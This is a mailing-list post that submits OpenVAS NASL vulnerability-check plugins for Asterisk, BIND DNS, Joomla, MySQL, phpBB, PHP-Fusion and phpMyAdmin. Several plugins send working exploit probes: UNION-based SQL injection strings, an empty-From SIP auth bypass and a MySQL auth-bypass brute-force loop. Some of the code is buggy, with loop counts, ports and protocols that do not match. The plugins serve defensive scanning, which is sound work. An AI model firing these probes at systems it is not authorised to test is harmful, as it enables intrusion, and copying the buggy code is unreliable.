Dear all,
We have modified our plugins submitted yesterday based on the advice
from Jan, and added three new plugins.
Note:
nopsec_mysql_auth_bypass.nasl: This plugin requires to attempt to login
MySQL with random password 1000 times which is brute force. For now, we
send a message to MySQL server including caps, lang, user name,
password, and check the response message to see if we could login
correctly. get_kb_item('mysql/'+port+'/lang') is one of the functions
we get from internet, but Jan has pointed that it may be invalid in
Openvas. So is there any replacement for such function or any better way
to login MySQL?
Attachement content:
2 asterisk (new), 1 joomla (new), 2 MySQL, 1 PHP, 1 PHPBB, 1 PHPMyAdmin,
1 DNS
##############################################################################
# OpenVAS Vulnerability Test
# $Id: nopsec_asterisk_ast_2012_006.nasl 110018
#2012-06-19 11:43:12 +0100 (Tue, 19 Jun 2012) $
#
# SIP channel driver in Asterisk suffers remote crash vulnerability
#
# Authors:
# Songhan Yu <[email protected]>
#
# Copyright:
# This script is Copyright NopSec Inc., http://www.nopsec.com
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License version 2
# (or any later version), as published by the Free Software Foundation.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
###############################################################################
if (description)
{
script_id(110018);
script_version("$Revision: 1.0 $");
script_tag(name:"last_modification", value:"$Date: 2012-06-19 11:43:12 +0100
(Tue, 19 Jun 2012) $");
script_tag(name:"creation_date", value:"2012-06-19 11:43:12 +0100 (Tue, 19 Jun
2012)");
script_cve_id("CVE-2012-2416");
script_bugtraq_id(53205);
script_tag(name:"cvss_base", value:"5.0");
script_tag(name:"risk_factor", value:"Medium");
script_name("SIP channel driver in Asterisk suffers remote crash
vulnerability");
script_summary("Check the version in SIP banner.");
script_description(
"Description:
chan_sip.c in the SIP channel driver in Asterisk Open Source 1.8.x before
1.8.11.1 and 10.x before 10.3.1 and Asterisk Business Edition C.3.x before
C.3.7.4, when the trustrpid option is enabled, allows remote authenticated
users to cause a denial of service (daemon crash) by sending a SIP UPDATE
message that triggers a connected-line update attempt without an associated
channel.
Recommendation:
Upgrate to 1.8.11.1 / 10.3.1 / C.3.7.4 or versions after.");
script_category(ACT_GATHER_INFO);
script_family("General");
script_copyright("This script is Copyright NopSec Inc.");
script_dependencies("secpod_asterisk_detect.nasl");
script_require_keys("Services/udp/sip");
exit(0);
}
include("version_func.inc");
port = get_kb_item("Services/udp/sip");port = 4569;
if(!port || !get_udp_port_state(port))exit(0);
version_asterisk = get_kb_item("Asterisk-PBX/Ver");
if(version_asterisk)
{
if(version_in_range(version:version_asterisk, test_version:"1.8",
test_version2:"1.8.11.1") ||
version_in_range(version:version_asterisk, test_version:"10",
test_version2:"10.3.1") ||
(version_asterisk =~ "^C\.3([^0-9]|$)"))
{
security_warning(port:port, proto:"udp");
exit(0);
}
}
exit(0);
##############################################################################
# OpenVAS Vulnerability Test
# $Id: nopsec_asterisk_sip_auth_bypass.nasl 110019
#2012-06-19 11:43:12 +0100 (Tue, 19 Jun 2012) $
#
# Asterisk SIP remote auth bypass
#
# Authors:
# Songhan Yu <[email protected]>
#
# Copyright:
# This script is Copyright NopSec Inc., http://www.nopsec.com
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License version 2
# (or any later version), as published by the Free Software Foundation.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
###############################################################################
if (description)
{
script_id(110019);
script_version("$Revision: 1.0 $");
script_tag(name:"last_modification", value:"$Date: 2012-06-19 11:43:12 +0100
(Tue, 19 Jun 2012) $");
script_tag(name:"creation_date", value:"2012-06-19 11:43:12 +0100 (Tue, 19
Jun 2012)");
script_cve_id("CVE-2008-1332");
script_bugtraq_id(28310);
script_tag(name:"cvss_base", value:"5.0");
script_tag(name:"risk_factor", value:"Medium");
script_name("Asterisk SIP remote auth bypass");
script_summary("Empty From header in invite message");
script_description(
"Description:
Certain version of Asterisk installed on the remote host allows remote
attackers to access the SIP channel driver via a crafted From header.
Recommendation:
Upgrade to Asterisk 1.2.27 / 1.4.18.1 / 1.4.19-rc3 / 1.6.0-beta6,
Asterisk Business Edition B.2.5.1 / C.1.6.2, AsteriskNOW 1.0.2,
Asterisk Appliance Developer Kit 1.4 revision 109393, s800i (Asterisk
Appliance) 1.1.0.2 or later.");
script_category(ACT_ATTACK);
script_family("General");
script_copyright("This script is Copyright NopSec Inc.");
script_dependencies("sip_detection.nasl");
script_require_keys("Services/udp/sip");
exit(0);
}
include("global_settings.inc");
port = get_kb_item("Services/udp/sip");
if (!port) port = 5060;
if (! get_udp_port_state(port)) exit(0);
# check if Asterisk.
banner = get_kb_item(strcat("sip/banner/", port));
if ("Asterisk" >!< banner) exit(0);
# Try to initiate a call.
msg_content = string(
"v=0\r\n",
"o=myhost 12345 12345 IN IP4 ", get_host_name(), "\r\n",
"c=IN IP4 ", get_host_name(), "\r\n",
"m=audio 16384 RTP/AVP 8 0 18 101\r\n",
"a=rtpmap:0 PCMU/8000");
data_invitation = string(
"INVITE sip:", get_host_name(), "\r\n",
"Via: SIP/2.0/UDP ", this_host(), ":", port, "\r\n",
"To: <sip:", get_host_name(), ":", port,
";branch=z9hG4bKfe06f452-2dd6-db11-6d02-000b7d0dc672;rport\r\n",
'From: "', SCRIPT_NAME, '" <sip:nopsec@', this_host(), ':', port,
'>;tag=de92d852-2dd6-db11-9d02-000b7d0dc672\r\n',
'To: <sip:nopsec@', get_host_ip(), ':', port, '>\r\n',
"Call-ID: ", rand(), "\r\n",
'CSeq: 1 INVITE\r\n',
"Contact: <sip:nopsec@", this_host(), ">\r\n",
"Max-Forwards: 70\r\n",
'Subject: ', SCRIPT_NAME, '\r\n',
"Content-Type: application/sdp\r\n",
"Content-Length: ", strlen(msg_content), "\r\n\r\n",
msg_content);
if (islocalhost()) priv_soc = open_sock_udp(port);
else priv_soc = open_priv_sock_udp(sport:5060, dport:port);
if (priv_soc)
{
send(socket:priv_soc, data:data_invitation);
received_msg = recv(socket:priv_soc, length:1024);
close(priv_soc);
}else exit(0);
filter="^SIP/[0-9]\.[0-9] 403 ";
# if forbidded
if (ereg(pattern:filter, string:egrep(pattern:"^SIP/", string:received_msg)))
{
# call with leaving From blank
data_invitation2 = data_invitation - strstr(data_invitation, 'From: ') +
'From: \r\n' +
strstr(data_invitation, 'To: ');
data_invitation2 = ereg_replace(pattern:"CSeq: 1 ", replace:"CSeq: 2 ",
string:data_invitation2);
if (islocalhost()) priv_soc = open_sock_udp(port);
else priv_soc = open_priv_sock_udp(sport:5060, dport:port);
if (priv_soc)
{
send(socket:priv_soc, data:data_invitation2);
received_msg2 = recv(socket:priv_soc, length:1024);
close(priv_soc);
}else exit(0);
filter="^SIP/[0-9]\.[0-9] ([1235-9][0-9][0-9]|4(0[24-9]|[1-9][0-9])) ";
# if no 403
if (ereg(pattern:filter, string:egrep(pattern:"^SIP/", string:received_msg2))
) {
security_hole(port);
exit(0);}
}
##############################################################################
# OpenVAS Vulnerability Test
# $Id: nopsec_dns_amplification 11006
#2012-06-18 11:43:12 +0100 (Mon, 18 Jun 2012) $
#
# Spoofed request DNS server DOS attack
#
# Authors:
# Songhan Yu <[email protected]>
#
# Copyright:
# This script is Copyright NopSec Inc., http://www.nopsec.com
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License version 2
# (or any later version), as published by the Free Software Foundation.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
###############################################################################
if(description)
{
script_id(11006);
script_version("$Revision: 1.0 $");
script_cve_id("CVE-2006-0987");
script_tag(name:"last_modification", value:"$Date: 2012-06-15 13:18:22 +0200
(Thu, 14 Jun 2012) $");
script_tag(name:"creation_date", value:"2012-06-15 13:15:22 +0200 (Thu, 14 Jun
2012)");
script_tag(name:"cvss_base", value:"6.4");
script_tag(name:"risk_factor", value:"High");
script_name("Spoofed request DNS server DOS attack");
script_description(
"Description:
When ISC BIND configured as a caching name server, allows recursive queries and
provides additional delegation information to arbitrary IP addresses. The
remote attackers could perform a DOS attack via DNS queries with spoofed source
IP addresses. Specifically is to check whether response message is more than
twice bigger than sent message (for name server record).
Recommendation:
restrict access to DNS server");
script_summary("cause a denial of service via DNS queries with spoofed source
IP addresses");
script_category(ACT_GATHER_INFO);
script_copyright("This script is Copyright NopSec Inc.");
script_family("Denial of Service");
script_dependencies("dns_server.nasl");
script_require_keys("DNS/udp/53");
exit(0);
}
include("global_settings.inc");
include("network_func.inc");
include("byte_func.inc");
if (! COMMAND_LINE && ! get_kb_item("DNS/udp/53")) exit(0);
port = 53;
if (! get_udp_port_state(port)) exit(0);
dns["id"] = rand() & 0xffff;
dns["flags"] = 0x0010; #?
dns["question"] = 1;
text=raw_string(0) + raw_string(0x0002 >> 8, 0x0002 & 0xff, 0x0001 >> 8,
0x0001 & 0xff);
return_value="";
dns_struct = make_list("id", "flags", "question", "answer_rr", "authority_rr",
"additional_rr");
foreach my_item ( dns_struct )
{
return_value += raw_string(dns[my_item] >> 8, dns[my_item]& 0xff);
}
return_value +=text;
my_packet = return_value; #Name server (NS) record
my_socket = open_sock_udp(port);
send(socket:my_socket, data:my_packet);
received_message = recv(socket:my_socket, length:4096);
close(my_socket);
if ( 2 * (strlen(my_packet))<(strlen(received_message)))
{
txt = strcat('\nThe DNS query was ', strlen(my_packet), ' bytes long, the
answer is ', strlen(received_message), ' bytes long.\n');
security_warning(port: 53, proto: "udp", data: txt);
if (COMMAND_LINE) display(txt);
}
##############################################################################
# OpenVAS Vulnerability Test
# $Id: nopsec_joomla_ignitegallery_gallery_sql_injection.nasl 110020
#2012-06-19 11:43:12 +0100 (Tue, 19 Jun 2012) $
#
# Joomla index.php gallery parameter suffers SQL injection
#
# Authors:
# Songhan Yu <[email protected]>
#
# Copyright:
# This script is Copyright NopSec Inc., http://www.nopsec.com
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License version 2
# (or any later version), as published by the Free Software Foundation.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
###############################################################################
if (description)
{
script_id(110020);
script_version("$Revision: 1.0 $");
script_tag(name:"last_modification", value:"$Date: 2012-06-19 11:43:12 +0100
(Tue, 19 Jun 2012) $");
script_tag(name:"creation_date", value:"2012-06-19 11:43:12 +0100 (Tue, 19
Jun 2012)");
script_cve_id("CVE-2008-6182");
script_bugtraq_id(31714);
script_tag(name:"cvss_base", value:"5.0");
script_tag(name:"risk_factor", value:"Medium");
script_name("Joomla index.php gallery parameter suffers SQL injection");
script_summary("SQL Injection vulnerability in ignite gallery");
script_description(
"Description:
Allows remote attackers to execute arbitrary SQL commands via the gallery
parameter in a view action to index.php.
Recommendation:
Upgrade Ignite Gallery to version 0.8.3.2 or later." );
script_category(ACT_ATTACK);
script_copyright("This script is Copyright NopSec Inc.");
script_family("Web application abuses");
script_dependencies("joomla_detect.nasl");
script_require_ports("Services/www", 80);
script_require_keys("joomla/installed");
exit(0);
}
include("global_settings.inc");
include("misc_func.inc");
include("http_func.inc");
include("http_keepalive.inc");
include("version_func.inc");
port = get_http_port(default:80);
if (!port) exit(0);
dir_joomla = get_dir_from_kb(port:port, app:"joomla");
if (!dir_joomla) exit(0);
special_char = string(SCRIPT_NAME, " Bang!");
sql_inj_script = "concat(";
for (i=0; i<strlen(special_char); i++)
sql_inj_script += hex(ord(special_char[i])) + ",";
sql_inj_script[strlen(sql_inj_script)-1] = ")";
sql_inj_script = string("-1+UNION+SELECT+1,2,", sql_inj_script,
",4,5,6,7,8,9,10+--+");
url = string(dir_joomla,
"/index.php?option=com_ignitegallery&task=view&gallery=", sql_inj_script
);
req=http_get(item:url,port:port);
received_msg = http_send_recv(port:port, data:req,bodyonly:TRUE);
if (received_msg &&
special_char >< received_msg &&
"components/com_ignitegallery" >< received_msg
)
{
security_warning(port);
exit(0);
}
##############################################################################
# OpenVAS Vulnerability Test
# $Id: nopsec_mysql_5_1_41.nasl 11003
#2012-06-18 11:43:12 +0100 (Mon, 18 Jun 2012) $
#
# MySQL version 5.1 < 5.1.41 contains several Vulnerabilities
#
# Authors:
# Songhan Yu <[email protected]>
#
# Copyright:
# This script is Copyright NopSec Inc., http://www.nopsec.com
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License version 2
# (or any later version), as published by the Free Software Foundation.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
###############################################################################
if (description)
{
script_id(11003);
script_version("$Revision: 1.0 $");
script_tag(name:"last_modification", value:"$Date: 2012-06-14 13:18:22 +0200
(Thu, 14 Jun 2012) $");
script_tag(name:"creation_date", value:"2012-06-14 13:15:22 +0200 (Thu, 14 Jun
2012)");
script_tag(name:"cvss_base", value:"6.4");
script_tag(name:"risk_factor", value:"High");
script_cve_id("CVE-2008-2079", "CVE-2009-4019", "CVE-2009-4028",
"CVE-2009-4030");
script_bugtraq_id(37075, 37076, 37297);
script_name("MySQL version 5.1 < 5.1.41 contains several Vulnerabilities");
script_summary("Check the version of MySQL");
script_description("
Description:
check if the version of MySQL 5.1 installed on the remote host is earlier than
5.1.41 which include multiple vulnerabilities such as crafted SELECT statement
crashing server and man-in-the-middle attacks.
Recommendation:
Upgrate MySQL to 5.56 or versions after.");
script_category(ACT_GATHER_INFO);
script_family("Databases");
script_copyright("This script is Copyrighted by NopSec Inc.");
script_dependencies("mysql_version.nasl");
script_require_ports("Services/mysql", 3306);
exit(0);
}
include("misc_func.inc");
include("version_func.inc");
include("global_settings.inc");
mysql_port = get_kb_item("Services/mysql");
if(!mysql_port) mysql_port = 3306;
if(!get_tcp_port_state(mysql_port)) exit(0);
mysql_version = get_mysql_version(port:mysql_port);
if(isnull(mysql_version))exit(0);
mysql_version = eregmatch(pattern:"([0-9.]+)", string:mysql_version);
current_mysql_version=mysql_version[0];
if(!isnull(current_mysql_version))
{
if (version_is_less(version:current_mysql_version, test_version:"5.1.41"))
security_hole(port:mysql_port);
exit(0);
}
exit(0);
##############################################################################
# OpenVAS Vulnerability Test
# $Id: nopsec_mysql_auth_bypass.nasl 110016
#2012-06-18 11:43:12 +0100 (Mon, 18 Jun 2012) $
#
# MySQL auth pypass
#
# Authors:
# Songhan Yu <[email protected]>
#
# Copyright:
# This script is Copyright NopSec Inc., http://www.nopsec.com
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License version 2
# (or any later version), as published by the Free Software Foundation.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
###############################################################################
if (description)
{
script_id(110016);
script_version("$Revision: 1.0 $");
script_tag(name:"last_modification", value:"$Date: 2012-06-18 13:18:22 +0200
(Thu, 14 Jun 2012) $");
script_tag(name:"creation_date", value:"2012-06-18 13:15:22 +0200 (Thu, 14 Jun
2012)");
script_cve_id("CVE-2012-2122");
script_tag(name:"risk_factor", value:"High");
script_name("MySQL auth pypass");
script_summary("Brute force to bypass MySQL login auth");
script_description(
"
Description:
the vulnerability is rooted in function of memcmp() which may return a value
out of range (-127,127). there is a 1 in 256 chance that ANY password would be
accepted for authentication.
Recommendation:
Upgrate MySQL to the latest version.
");
script_category(ACT_GATHER_INFO);
script_family("Databases");
script_copyright("This script is Copyright NopSec Inc.");
script_dependencies("mysql_version.nasl");
script_require_ports("Services/mysql", 3306);
exit(0);
}
include("global_settings.inc");
include("misc_func.inc");
include("http_func.inc");
include("http_keepalive.inc");
include("byte_func.inc");
port = get_kb_item("Services/mysql");
if(!port) port = 3306;
if(!get_tcp_port_state(port)) exit(0);
user="root";
caps=get_kb_item('mysql/'+port+'/caps');
lang=get_kb_item('mysql/'+port+'/lang');
caps = caps &(0xFFFFFFFF - 32 - 2048);
function mkbyte()
{
local_var l;
l = _FCT_ANON_ARGS[0];
return raw_string(l & 0xff);
}
post_data =mkdword(caps) +mkdword(0xFFFF) + mkbyte(lang) +
crap(data:raw_string(0), length:23) +user + mkbyte(0);
soc=open_sock_udp(port);
for (i=0;i<10;i++) #brutal force 1000 times
{ #random password
pwd=rand();
SHA_pwd = SHA1(pwd);
post_data +=mkbyte(strlen(SHA_pwd))+SHA_pwd;
post_data=raw_string(strlen(post_data) & 0xff, (strlen(post_data) >> 8) &
0xff, (strlen(post_data) >> 16) & 0xff) +
mkbyte(1) +post_data;
send(socket:soc,data:post_data);
received_msg=recv(socket:soc,length:4096);
if (isnull(received_msg)) continue;
if ("Access denied" >< received_msg || "Incorrect" >< received_msg)
continue;
report="Vulnerability found! username is root, and password is"+pwd;
security_warning(port:port,data:report);
break;
}
display ("no venerability found");
exit(0);
##############################################################################
# OpenVAS Vulnerability Test
# $Id: nopsec_mysql_auth_bypass.nasl 110016
#2012-06-18 11:43:12 +0100 (Mon, 18 Jun 2012) $
#
# MySQL auth pypass
#
# Authors:
# Songhan Yu <[email protected]>
#
# Copyright:
# This script is Copyright NopSec Inc., http://www.nopsec.com
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License version 2
# (or any later version), as published by the Free Software Foundation.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
###############################################################################
if (description)
{
script_id(110017);
script_version("$Revision: 1.0 $");
script_cve_id("CVE-2006-4758", "CVE-2006-6421", "CVE-2006-6839",
"CVE-2006-6840", "CVE-2006-6841");
script_bugtraq_id(20347, 21806, 22001);
script_name("phpbb version < 2.0.22 suffers multiple vulnerabilities");
script_summary("Tries to pass a 'bad' redirect in via phpBB");
script_description(
"Description:
phpbb version < 2.0.22 suffers XSS attack which allows remote authenticated
users to inject arbitrary web script or HTML via the 'Message body' field in a
message to a non-existent user.
Recommendation:
Upgrate phpbb to 2.0.22 or versions after." );
script_category(ACT_ATTACK);
script_family("Web application abuses");
script_copyright("This script is Copyright NopSec Inc.");
script_dependencies("phpbb_detect.nasl");
script_require_ports("Services/www", 80);
script_exclude_keys("Settings/disable_cgi_scanning");
exit(0);
}
include("global_settings.inc");
include("misc_func.inc");
include("http_func.inc");
include("http_keepalive.inc");
port = get_http_port(default:80);
if (!can_host_php(port:port)) exit(0);
test_install = get_kb_item(string("www/", port, "/phpBB"));
if (isnull(test_install)) exit(0);
test_matches = eregmatch(string:test_install, pattern:"^(.+) under (/.*)$");
if (isnull(test_matches)) exit(0);
url = string(test_matches[2], "/login.php");
req = http_get(port:port, item:url);
received_msg = http_keepalive_send_recv(port:port, data:req, bodyonly:TRUE);
filter='form action="login.php?sid=';
if (received_msg && filter >< received_msg)
{
redirect = string("/", SCRIPT_NAME, ";url=", unixtime());
data_post = string("username=&password=&redirect=", redirect,
"&login=Log+in");
req = http_post(port:port, item:url,data:data_post);
received_msg = http_keepalive_send_recv(port:port, data:req, bodyonly:TRUE);
filter=string('refresh" content="3;url=login.php?redirect=', redirect,
'">');
if (received_msg && filter >< received_msg)
{
security_hole(port:port);
exit(0);
}
}
##############################################################################
# OpenVAS Vulnerability Test
# $Id: nopsec_php_fusion_extract_sql_injections.nasl 110014
#2012-06-18 11:43:12 +0100 (Mon, 18 Jun 2012) $
#
# Variable overwriting vulnerability in PHP fusion
#
# Authors:
# Songhan Yu <[email protected]>
#
# Copyright:
# This script is Copyright NopSec Inc., http://www.nopsec.com
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License version 2
# (or any later version), as published by the Free Software Foundation.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
###############################################################################
if (description)
{
script_id(110014);
script_version("$Revision: 1.0 $");
script_tag(name:"last_modification", value:"$Date: 2012-06-14 13:18:22 +0200
(Thu, 14 Jun 2012) $");
script_tag(name:"creation_date", value:"2012-06-14 13:15:22 +0200 (Thu, 14 Jun
2012)");
script_tag(name:"cvss_base", value:"6.4");
script_tag(name:"risk_factor", value:"High");
script_cve_id("CVE-2006-4673");
script_bugtraq_id(19908, 19910);
script_name("Variable overwriting vulnerability in PHP fusion");
script_summary("Overwrite $_SERVER[REMOTE_ADDR] with PHP-Fusion");
script_description(
" Description:
The remote host fails to restrict the variables that could be registered,
attackers can make use of this flaw to generate multiple attacks on affected
application.
Recommendation:
None yet." );
script_category(ACT_ATTACK);
script_family("Web application abuses");
script_copyright("This script is Copyright NopSec Inc.");
script_dependencies("gb_php_detect.nasl");
script_require_ports("Services/www", 80);
script_require_keys("php/installed");
exit(0);
}
include("global_settings.inc");
include("misc_func.inc");
include("http_func.inc");
include("http_keepalive.inc");
port = get_http_port(default:80);
if(!get_port_state(port)) exit(0);
php_version=get_kb_item(string("www/", port, "/php-fusion"));
if(isnull(php_version)) exit(0);
php_match=eregmatch(pattern:"^(.+) under (/.*)$", string:php_version);
if (isnull(php_match)) exit(0);
dir = php_match[2];
sql_script = string(
rand() % 255, ".", rand() % 255, ".", rand() % 255, ".111",
"'/**/UNION+SELECT+", SCRIPT_NAME, "--"
);
url=string(dir, "/news.php?_SERVER[REMOTE_ADDR]=", sql_script);
req = http_get(port:port, item:url);
received_msg = http_keepalive_send_recv(port:port, data:req, bodyonly:TRUE);
if (isnull(received_msg)) exit(0);
filter=string("syntax to use near '", sql_script - strstr(sql_script,
".111"), "''");
if (filter >< received_msg)
{
security_note(port);
set_kb_item(name: 'www/'+port+'/SQLInjection', value: TRUE);
exit(0);
}
##############################################################################
# OpenVAS Vulnerability Test
# $Id: nopsec_phpbb_2022.nasl 110015
#2012-06-18 11:43:12 +0100 (Mon, 18 Jun 2012) $
#
# phpMyAdmin version < 3.3.10.1 / 3.4.1 suffers multiple Vulnerabilities
#
# Authors:
# Songhan Yu <[email protected]>
#
# Copyright:
# This script is Copyright NopSec Inc., http://www.nopsec.com
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License version 2
# (or any later version), as published by the Free Software Foundation.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
###############################################################################
if (description)
{
script_id(110015);
script_version("$Revision: 1.0 $");
script_cve_id("CVE-2011-1940", "CVE-2011-1941");
script_bugtraq_id(47945, 47943);
script_name("phpMyAdmin version < 3.3.10.1 / 3.4.1 suffers multiple
Vulnerabilities");
script_summary("Check the version of phpMyAdmin");
script_description(
"The version of phpMyAdmin earlier than 3.3.10.1 or 3.4.1 suffers from several
Vulnerabilities. For example, tbl_links.php , url.php and tbl-tracking fails to
sanitize the input parameters of table and db. THe attacker could make use of
this to perform injection attacks.
Recommendation:
Upgrate phpMyAdmin to 3.3.10.1 or 3.4.1 or versions after.");
script_category(ACT_GATHER_INFO);
script_family("Web application abuses");
script_copyright("This script is Copyright NopSec Inc.");
script_dependencies("secpod_phpmyadmin_detect_900129.nasl");
script_require_ports("Services/www", 80);
script_exclude_keys("Settings/disable_cgi_scanning");
script_require_keys("phpMyAdmin/installed");
exit(0);
}
include("http_func.inc");
include("version_func.inc");
port = get_http_port(default:80);
if(!get_port_state(port) || !can_host_php(port:port))exit(0);
php_info=get_kb_item("www/" + port + "/phpMyAdmin");
php_version= eregmatch(pattern:"(.*) under (/.*)", string:php_info);
current_version=php_version[1];
if (current_version)
{
if (version_in_range(version: current_version, test_version: "3.3",
test_version2: "3.3.10.1")
|| version_in_range(version: current_version, test_version: "3.4",
test_version2: "3.4.1"))
security_warning(port:port);
exit(0);
}
exit(0);
_______________________________________________
Openvas-plugins mailing list
[email protected]
http://lists.wald.intevation.org/cgi-bin/mailman/listinfo/openvas-plugins
